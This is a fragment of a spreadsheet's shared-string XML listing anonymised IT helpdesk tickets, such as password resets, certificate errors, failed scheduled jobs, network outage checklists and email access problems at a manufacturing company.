    <t>uvorgwts mlqzaicb</t>
  </si>
  <si>
    <t>jvshydix rzpmnylt</t>
  </si>
  <si>
    <t>vip 2: ie crashes on opening mii from ess portal</t>
  </si>
  <si>
    <t xml:space="preserve">vip 2: ie crashes on opening mii from ess portal
phone: </t>
  </si>
  <si>
    <t>renew internal certificate for password_management_tool password manager</t>
  </si>
  <si>
    <t>e-mail and certificates not going to lean participants</t>
  </si>
  <si>
    <t>today, i created a lean event in our collaboration_platform lean tracker and after submitting the event, no participant got any e-mail or lean certificate. lean tracker id for the event i created is 16100349662.</t>
  </si>
  <si>
    <t>unable to create a collaboration_platform collaboration_platform workbook on accounts due to duplicate detetection</t>
  </si>
  <si>
    <t>pollaurid is unable to enable sp on an account without getting an error indicating there are potential duplicates. the account is different than the other 31 but does use the same email address, which i believe dup detection is based off of. when he attempts to save anyways, he get a business process error.  pls refer to  account #81184849 as an example as well as the attached screen shots.</t>
  </si>
  <si>
    <t xml:space="preserve">issue in viewing pay statements in hr_tool </t>
  </si>
  <si>
    <t xml:space="preserve">it appears that i have a browser issue in viewing pay statements in hr_tool (see emails below).  are you able to help me to view these screens?_x000D_
_x000D_
               </t>
  </si>
  <si>
    <t xml:space="preserve">global_telecom_1 number </t>
  </si>
  <si>
    <t>telephony_software password reset</t>
  </si>
  <si>
    <t xml:space="preserve">good morning, need a password reset for telephony_software for  - vfjsubao yihelxgp 
id: taylthyuoaj
workstation: ldgl8513929 
</t>
  </si>
  <si>
    <t>vfjsubao yihelxgp</t>
  </si>
  <si>
    <t>printer not printing</t>
  </si>
  <si>
    <t>cad team code - characteristic</t>
  </si>
  <si>
    <t xml:space="preserve">can you please add "manuf eng â€“ us_plant" ?_x000D_
</t>
  </si>
  <si>
    <t>minitab license issue - cannot run minitab as of early am 10/3/2016</t>
  </si>
  <si>
    <t xml:space="preserve">minitab license issue - cannot run minitab as of early am 10/3/2016.  minitab throws a license server not found error.  this is affecting production in the usa site. </t>
  </si>
  <si>
    <t>hr_tool time application - this morning i do not have the my time stamp selection on my timecard.  i cannot log in and clock</t>
  </si>
  <si>
    <t xml:space="preserve">hr_tool time application - this morning i do not have the my time stamp selection on my timecard.  i cannot log in and clock in.  i was here on time this morning and i cannot clock myself in. local it stefyty dabhruji already looked at it, appears there is something wrong with my account of the application. 
phone 
email ylfqrzxg.jmakitug@gmail.com
</t>
  </si>
  <si>
    <t>ylfqrzxg jmakitug</t>
  </si>
  <si>
    <t>crm issue for iphone</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zfburidj.jmilguev@gmail.com_x000D_
_x000D_
hi there,_x000D_
_x000D_
i am trying to set up crm on my iphone and it asks for the company's crm address - what is it?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ygdrujzi rvyjdlwb</t>
  </si>
  <si>
    <t>url not working</t>
  </si>
  <si>
    <t>password_management_tool password manager change?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hpqjaory.gfrwmije@gmail.com_x000D_
_x000D_
can someone please advise if we are still utilizing password_management_tool password manager?_x000D_
_x000D_
i can't connect to this site to do a mass update of my new password to all accounts._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>reset passwords for qwsjptlo hnlasbed using password_management_tool password reset.</t>
  </si>
  <si>
    <t>goaxzsql qpjnbgsa</t>
  </si>
  <si>
    <t>business_client issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: eqtofwbm.mojfbwds@gmail.com_x000D_
_x000D_
hi it support,_x000D_
_x000D_
one of our users have problem with running of business_client client. he is still getting error message that net framdntyework is not installed on your pc. i tried to reinstall it but no success._x000D_
_x000D_
is it known issue? please can you help us how to solve it?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>eqtofwbm mojfbwds</t>
  </si>
  <si>
    <t>hardware item coming wrong  in labeling in warehouse_tool .</t>
  </si>
  <si>
    <t>please change erp logic that currently identifies hardware items for warehouse_tool to include rqfhiong zkwfqagb classification of hdw, see attached email. assign to vamthrsee krisyuhnyrt</t>
  </si>
  <si>
    <t>tzbqlfao dhlbputy</t>
  </si>
  <si>
    <t>problem opening the password_management_tool password manager</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jmrukcfq.rdyuxomp@gmail.com_x000D_
_x000D_
the screenshot below is the message i received when i tried to open the password_management_tool password manager site this morning to reset my password.   please advise._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jmrukcfq rdyuxomp</t>
  </si>
  <si>
    <t>circuit outage: india carrier, company-ap-ind-carrier-891-dmvpn-rtr01 is down at 7am et on 10/03. site is up on secondary.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     x_____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _no________     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _7am et on 10/03_____________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? no_______    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _no______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  yes______    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ______yes__     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    __na_________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</si>
  <si>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passwords to be reset for erp SID_34</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dpuifqeo.eglwsfkn@gmail.com_x000D_
_x000D_
please reset the following passwords in erp SID_34 â€“ us_plant employees_x000D_
_x000D_
knemilvx dvqtziya_x000D_
nabjwvtd sprhouiv_x000D_
</t>
  </si>
  <si>
    <t>reset the password for jmusidzr sratdeol on erp / production / hcm</t>
  </si>
  <si>
    <t>united kingdom has problems with making outbound calls</t>
  </si>
  <si>
    <t xml:space="preserve">united kingdom has issues with making outbound calls._x000D_
this is on the telephony_software as on the siemens pbx. </t>
  </si>
  <si>
    <t>a user was able to add a zj partner in SID_34 and they don't have security to do so.  please advise how this can be fixed.</t>
  </si>
  <si>
    <t xml:space="preserve">someone in the service center was able to successfully add a zj partner to an existing customer master account in SID_34._x000D_
we set it up that only the 9 users assigned to the sd:cust_mast_partner_func_zj role would have add/edit/delete access to this partner function._x000D_
here is a summary of what happened per lillanna:_x000D_
he (ujxvrlzg pkaegicn) was using SID_34 ecc. what is strange is that the system gave him a warning that he is not allowed to add zj partner function. he could not even save changes until he cleared the zj field. but it seems the system added the zj partner function anyway when he saved the account.  (the account was 81030623 and he added zj partner of 81907354.)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>nkthumgf mwgdenbs</t>
  </si>
  <si>
    <t>pos data -  september, 2016.</t>
  </si>
  <si>
    <t xml:space="preserve">please provide pos data for the month of september '16._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mxawhbun siyqthel</t>
  </si>
  <si>
    <t xml:space="preserve">
from: nwfodmhc exurcwkm 
sent: monday, october 03, 2016 3:26 pm
to: 'shivakuhdty.s@company.com'
cc: tiyhum kuyiomar
subject: password reset 
hi shivakuhdty,
your account was locked out, we unlocked your account. please try login with your existing password as you are ess user we have not changed your password. please replay back if you have any issue.
</t>
  </si>
  <si>
    <t>vfitdsyk lpezkyqx</t>
  </si>
  <si>
    <t>outlook security certificate notification</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vsiemxgh.lgeciroy@gmail.com_x000D_
_x000D_
dear sir / mam,_x000D_
_x000D_
kindly refer below screenshot where this notification is prompting again and again._x000D_
_x000D_
[cid:image001.jpg@01SID_35d7d.f769a8a0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>vsiemxgh lgeciroy</t>
  </si>
  <si>
    <t>sales office mw01 is not defined for sales area 1409 0sartlgeo lhqksbdx0</t>
  </si>
  <si>
    <t>when we opened new order  35093500 we got communicate tahat order is incomplete._x000D_
sale office is not determinated. when we try enter right sales office mw01  - i can't add the chanhes_x000D_
print screen in attached</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/03/2016 04:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/03/2016 04:04:00</t>
  </si>
  <si>
    <t>issue is not resolved. error : @80@validity of certificate from list with pse &gt; ssl</t>
  </si>
  <si>
    <t>browser:microsoft internet explorer
email:gqcyomwf.opjaiwcu@gmail.com
customer number:
telephone:
summary:erp error:
@80@validity of certificate from list with pse &gt; ssl
client (standard) &lt; ends in 2 days,</t>
  </si>
  <si>
    <t>gqcyomwf opjaiwcu</t>
  </si>
  <si>
    <t>reset the password for dqowbefk prgxwzco on erp / production / hcm</t>
  </si>
  <si>
    <t xml:space="preserve">i've just changed my all passwords because of expiration but erp does not accept the new password, it says that the name and password is not correct. please fix it , </t>
  </si>
  <si>
    <t>dqowbefk prgxwzco</t>
  </si>
  <si>
    <t>engineering tool - erp system message</t>
  </si>
  <si>
    <t xml:space="preserve">a few users have reported the seeing the attached error message today regarding certificate validity,_x000D_
</t>
  </si>
  <si>
    <t>bex analyzer and bex designer is not working.</t>
  </si>
  <si>
    <t>erpsys- certificate errors</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qgrbnjiu.hidzlfma@gmail.com
hi
i have just started having below system massage and it prompts every time i move from erp nord to nord, bothering me. please advise what this is about, and what should i do on this?
[cid:image001.png@01SID_35d90.73d9b7b0]
qgrbnjiu hidzlfma
manager, warehouse &amp; distribution 
qgrbnjiu.hidzlfma@gmail.com&lt;mailto:qgrbnjiu.hidzlfma@gmail.com&gt;
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
[#+company/posts&gt;  [
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>hgcrtxez azoeingw</t>
  </si>
  <si>
    <t>office has to be upgraded to 2016</t>
  </si>
  <si>
    <t>reset passwords for bxeagsmt zrwdgsco using password_management_tool password reset.</t>
  </si>
  <si>
    <t>look for identifying the root cause &amp; solution - inter-co intransit  8058329437</t>
  </si>
  <si>
    <t>dn 9169430548 has been received on august 11, 2014 but the same dn, mm#, qty have arrived on october 3, 2016. duplicated. please help finding the root cause why the duplicated dn could have been pgi'd. since the dn was already received, plant_317 is not able to perform the gr against this intransit, please provide the best solution to process the gr.</t>
  </si>
  <si>
    <t>engineering_tool not working</t>
  </si>
  <si>
    <t xml:space="preserve">hello
please support our dealer for engineering_tool installation. contact details below:
best </t>
  </si>
  <si>
    <t>sihtvocw yspnqxgw</t>
  </si>
  <si>
    <t>server access rights for hpmjtgik blrmfvyh</t>
  </si>
  <si>
    <t xml:space="preserve">help desk_x000D_
_x000D_
please usa an access right to hpmjtgik blrmfvyh to following folder :_x000D_
_x000D_
\\HostName_47\departments\finance_x000D_
_x000D_
she is new staff for eh japan / finance department and i am her reportncqulao qauighdpnager._x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>access to m drive</t>
  </si>
  <si>
    <t xml:space="preserve">please provide access to mtb mt sales drive ._x000D_
_x000D_
for any clarification pl call me back_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas i</t>
  </si>
  <si>
    <t xml:space="preserve">personal device._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qlurtxzs qalsvutw</t>
  </si>
  <si>
    <t>lbxugpjw cnmfbdui-mobile phone changed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lbxugpjw.cnmfbdui@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
_x000D_
i changed my mobile phone and below informations belong to my own personal phone.could you provide to use my new mobile phone device for mails._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lbxugpjw cnmfbdui</t>
  </si>
  <si>
    <t xml:space="preserve">network outage:russia russia - warehouse network is down since 12:35 am et on 10/03/16 </t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________12:35 am et on 10/03/16 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____no__    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___yes______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____no______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  _____na__     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>account expired- vvamirsdwnp - pallutyr not able to log-in</t>
  </si>
  <si>
    <t xml:space="preserve">from: kuhyndan lalthy 
sent: monday, october 03, 2016 9:52 am
to: nwfodmhc exurcwkm
cc: qjgnkhso vahgolwx
subject: re: user id : vvamirsdwnp - pallutyr not able to log-in
pallutyr who is having user id vvamirsdwnp not able to log-in the window etc. can you check it urgently? kindly provide access upto december 31, 2016.
</t>
  </si>
  <si>
    <t>dntxagwc whfdqxcs</t>
  </si>
  <si>
    <t>lehsm012 &amp; lehsm013 are down at at usa company  since 4:16 am on 10/01 et</t>
  </si>
  <si>
    <t>lehsm012 &amp; lehsm013 are down since 4:16 am on 10/01 et</t>
  </si>
  <si>
    <t>network port not working</t>
  </si>
  <si>
    <t>network port is not work and wifi network is very poor</t>
  </si>
  <si>
    <t>whavkycs unihdlfy</t>
  </si>
  <si>
    <t>unable to post billing to account - billed quantity 0</t>
  </si>
  <si>
    <t xml:space="preserve">unable to post billing to account - billed quantity 0_x000D_
_x000D_
1325 ic5314 i 27.09.2016 ziv vvsallz 28.09.2016 ic5314 0159216101_x000D_
1325 ic5314 i 29.09.2016 ziv oprbatch 29.09.2016 ic5314 0159225544_x000D_
</t>
  </si>
  <si>
    <t>lckagtry xcrmzgli</t>
  </si>
  <si>
    <t>need help in changing password on password_management_tool</t>
  </si>
  <si>
    <t xml:space="preserve">volume: c:\ label:sys-lhqsm68356 543aa385 on server: lhqsm68356 is over </t>
  </si>
  <si>
    <t xml:space="preserve">volume: c:\ label:sys-lhqsm68356 543aa385 on server: lhqsm68356 is over 
85% space consumed. space available: 4.2 g </t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_search_server_prod_daily failed in job_scheduler at: 10/02/2016 23:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_search_server_prod_daily failed in job_scheduler at: 10/02/2016 23:20:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 10/02/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 10/02/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 10/02/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 10/02/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 10/02/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 10/02/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_206:volume: /dev/SID_56ora is over 98% space consumed. </t>
  </si>
  <si>
    <t>HostName_206: volume: /dev/SID_56ora on server: HostName_206 is over 98% space consumed. space available: 491 m</t>
  </si>
  <si>
    <t>always upservice.exe is not running on HostName_521</t>
  </si>
  <si>
    <t>wireless outage again-taiwan 1003</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ticqvhal.vgokzesi@gmail.com_x000D_
_x000D_
hello~_x000D_
_x000D_
wireless(companysecure) outage of taiwan._x000D_
please help~_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ticqvhal vgokzesi</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2549 failed in job_scheduler at: 10/02/2016 20:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2549 failed in job_scheduler at: 10/02/2016 20:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_562 failed in job_scheduler at: 10/02/2016 17:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_562 failed in job_scheduler at: 10/02/2016 17:36:00</t>
  </si>
  <si>
    <t>zifujpvr vxfkwaqh</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: makiosjc.kxapdhnm@gmail.com_x000D_
_x000D_
zifujpvr vxfkwaqh's email is not working. can i get an update on this?  his email is still not working._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>makiosjc kxapdhnm</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 10/02/2016 13:56:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 10/02/2016 13:56:00</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_2_regen failed in job_scheduler at: 10/02/2016 12:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_2_regen failed in job_scheduler at: 10/02/2016 12:20:00</t>
  </si>
  <si>
    <t>email not working - "the server couldn't be contacted" message</t>
  </si>
  <si>
    <t>contact phone - 
company email not working - "the server couldn't be contacted" error message
owa also not working</t>
  </si>
  <si>
    <t>ie browser issue : website not loading its contents completely</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrattr failed in job_scheduler at: 10/02/2016 10:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrattr failed in job_scheduler at: 10/02/2016 10:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">frequent account lock out </t>
  </si>
  <si>
    <t xml:space="preserve">frequent account lock out _x000D_
ran lock out status.._x000D_
account was getting locked out from one of the wifi devices.._x000D_
took control of machine and started credential manager services.._x000D_
deleted bunch of passwords saved in credential manager .._x000D_
asked user to remove company secure from mobile device and keep wifi disabled for couple of days..and can enable it when at home._x000D_
also undocked computer and docked it back ..tried login in..it worked..._x000D_
locked system and unlocked it with no difficulty.._x000D_
keeping account/ticket under observation._x000D_
arranging call back tomorrow as i will be ooo. </t>
  </si>
  <si>
    <t>mrduhsci xmvkzqja</t>
  </si>
  <si>
    <t>cannot access mail from any device using owa or outlook</t>
  </si>
  <si>
    <t>i lost access to mail on 9/29.  i went in and checked the o365 setting for my account and found the error attached (error1) on my account.  i removed my e5 license and applied and e4 to see if that would resolve the issue but i still can't get into my email.  if i try accessing my account via owa i get attrachment error2_x000D_
_x000D_
this may be an issue with all e5 licenses, they have all expired.  i cannot receive email so i will not receive any replies or emails concerning this ticket.</t>
  </si>
  <si>
    <t>sdxjiwlq ynowzqfh</t>
  </si>
  <si>
    <t>reminder for approval of requisition 01453742 , already approved this request in erp</t>
  </si>
  <si>
    <t>oydlehun svnfrxdk</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 10/02/2016 03:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 10/02/2016 03:37:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3051 failed in job_scheduler at: 10/02/2016 03:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3051 failed in job_scheduler at: 10/02/2016 03:39:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/02/2016 01:28:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/02/2016 01:28:00</t>
  </si>
  <si>
    <t>only erp running slow in Israel.internet is working fine.</t>
  </si>
  <si>
    <t xml:space="preserve">only erp running slow.
internet is working fine.
all transactions are running slow.
contact # :
erp system : SID_34 (all transactions)
checking with dac team.
</t>
  </si>
  <si>
    <t>wqfzjycu omleknjd</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1142 failed in job_scheduler at: 10/02/2016 00:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1142 failed in job_scheduler at: 10/02/2016 00:14:00</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_wkly_qux1 failed in job_scheduler at: 10/02/2016 00:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_wkly_qux1 failed in job_scheduler at: 10/02/2016 00:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 10/02/2016 00:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 10/02/2016 00:09:00</t>
  </si>
  <si>
    <t>want to make sure if erp is in maintenance right now</t>
  </si>
  <si>
    <t>name:kvrmnuix yicpojmf
language:
browser:microsoft internet explorer
email:qiwthyang@company.com
customer number:
telephone:
summary:cannot connect to company server</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1665 failed in job_scheduler at: 10/01/2016 18:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1665 failed in job_scheduler at: 10/01/2016 18:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">job oemcold failed in job_scheduler at: 10/01/2016 15:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job oemcold failed in job_scheduler at: 10/01/2016 15:09:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1108w failed in job_scheduler at: 10/01/2016 15:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1108w failed in job_scheduler at: 10/01/2016 15:09:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 10/01/2016 14:26:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 10/01/2016 14:26:00</t>
  </si>
  <si>
    <t>call conference to nahytu</t>
  </si>
  <si>
    <t>password reset alert from o365</t>
  </si>
  <si>
    <t>the e-mail account of horeduca ogrhivnm has come up in my outlook folders.</t>
  </si>
  <si>
    <t>this is a serious breach of security as she is in hr. please correct immediately</t>
  </si>
  <si>
    <t>reset passwords for wxdvjoct ckxwtoam using password_management_tool password reset.</t>
  </si>
  <si>
    <t>wxdvjoct ckxwtoam</t>
  </si>
  <si>
    <t xml:space="preserve">when trying to hit the one note button on existing crm opportunities, it gives attached errir message </t>
  </si>
  <si>
    <t>ms crm dynamics issue : collaboration_platform not mfg_toolting with crm_x000D_
enabled collaboration_platform and collaboration_platform mfg_tooltion: saved changes, no go_x000D_
added site to compatibility mode , reset , cleared cookies cache ..no go..._x000D_
 user not really sure if this worked before in past.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ohdrnswl.rezuibdt@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
_x000D_
_x000D_
link is not working. kindly resolve yhe issue on urgent basis._x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>reset passwords for ytzpxhql ntfxgpms using password_management_tool password reset.</t>
  </si>
  <si>
    <t>ytzpxhql ntfxgpms</t>
  </si>
  <si>
    <t>erp password reset : SID_37</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i can not log into the vpn for na</t>
  </si>
  <si>
    <t>windows account was locked out : unlocked account</t>
  </si>
  <si>
    <t>engineering_tool installation for sathyrui shiragavi user id :; cpinsety01 and cpinsety02 channel partner  - inspiron enterprise</t>
  </si>
  <si>
    <t>replied to email sending instructions how to install engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve"> problem when clicking on the shop link in purchasing when using internet explorer.</t>
  </si>
  <si>
    <t xml:space="preserve">
from: alkuozfr bhqgdoiu 
sent: saturday, october 01, 2016 4:35 pm
to: zbpdhxvk nowxjztk; mpihysnw wrctgoan
cc: aghynilthykurtyar  gorlithy; inxsupmy zhwmifvx; oxlqvika zrvbahym; rujteoza mcoswhjuanthila; dctviemg muapxkns; wfgtyill hannathry; nwfodmhc exurcwkm
subject: re: ie issues encountered
all,
i am getting this problem when clicking on the shop link in purchasing when using internet explorer.
there is an error message that pops up. i should get a list of the catalogs but i do not.
it sends me to the below screen (second screen shot). not sure if this is my problem or more widespread
</t>
  </si>
  <si>
    <t>reisekostenabrechnung in erp nicht mÃ¶glich!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: byclpwmv.esafrtbh@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
reisekostenabrechnung in erp leider nicht mÃ¶glich. siehe fehlermeldung unten:_x000D_
[cid:image001.jpg@01SID_35be6.bd6e34b0]_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>power outage : usa- (company) site hard down since 4:15 am et on 10/01</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________4:15 am et on 10/01_____________x000D_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____no____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</si>
  <si>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engineering_tool new customer creation please refer : inplant_864166</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: skmdgnuh.utgclesd@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
still i am not able create new customer in engineering_tool, please resolve the issues at the earliest._x000D_
_x000D_
_x000D_
[cid:image001.png@01SID_35be1.7d820430]_x000D_
_x000D_
with warm </t>
  </si>
  <si>
    <t>have problem to access erp hana-urgent</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: neokfwiy.ufriscym@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
same issue repeated again, have problem to use the programdnty._x000D_
_x000D_
please help to solve the issue aerp, need to run &amp; submit the report on oct 3, 2016_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>neokfwiy ufriscym</t>
  </si>
  <si>
    <t>email id: spelling error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: santthyumar.shtyhant@company.com_x000D_
_x000D_
dear sir/madam,_x000D_
_x000D_
there is a correction needed in spelling of my email id_x000D_
_x000D_
existing email id: santthyumar.shtyhant@company.com&lt;mailto:santthyumar.shtyhant@company.com&gt;_x000D_
_x000D_
email id to be changed to: ploxzuts.utvimnwo@gmail.com&lt;mailto:ploxzuts.utvimnwo@gmail.com&gt;_x000D_
_x000D_
pl do the needful_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_infonet1_full failed in job_scheduler at: 10/01/2016 01:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_infonet1_full failed in job_scheduler at: 10/01/2016 01:39:00</t>
  </si>
  <si>
    <t xml:space="preserve">windows account  locked </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_564 failed in job_scheduler at: 10/01/2016 00:04:00  </t>
  </si>
  <si>
    <t xml:space="preserve">received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_564 failed in job_scheduler at: 10/01/2016 00:04:00  </t>
  </si>
  <si>
    <t>network outage : engineering_toolkuznetsk warehouse - site hard down since 6:32 pm et on 09/30.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________6:32 pm et on 09/30._____________x000D_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____no__    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   __na______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ______no___     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______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</si>
  <si>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bkbackup_tool_HostName_768_prod_full failed in job_scheduler at: 09/30/2016 23:59:00  </t>
  </si>
  <si>
    <t xml:space="preserve">received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_HostName_768_prod_full failed in job_scheduler at: 09/30/2016 23:59:00  </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_534 failed in job_scheduler at: 10/01/2016 01:04:00  </t>
  </si>
  <si>
    <t xml:space="preserve">received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_534 failed in job_scheduler at: 10/01/2016 01:04:00  </t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 09/30/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 09/30/2016 23:00:00</t>
  </si>
  <si>
